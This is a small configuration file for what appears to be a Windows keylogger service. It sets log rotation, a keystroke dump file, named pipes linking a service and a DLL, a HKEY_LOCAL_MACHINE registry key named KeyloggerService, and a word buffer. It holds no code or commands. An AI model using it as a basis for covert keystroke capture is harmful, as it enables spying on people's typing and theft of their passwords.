application.logger.name: AppLogger
application.logger.level: debug
application.logger.file: app2.log
application.logger.rotation: 2 M
application.logger.pattern: [%Y-%m-%d %H:%M:%S.%i] %s: %t
application.service.pipe.path: \\\\.\\pipe\\servicePipe
application.dll.pipe.path: \\\\.\\pipe\\dllpipe
application.keylogger.level: debug
application.keylogger.file: keylogger2.dump
application.keylogger.rotation: 2 M
application.keylogger.pattern: [%Y-%m-%d %H:%M:%S.%i] %s: %t

application.service.registry.path: HKEY_LOCAL_MACHINE\\Software\\KeyloggerService


application.keylogger.wordbuffer: 200
application.keylogger.editfeatures: true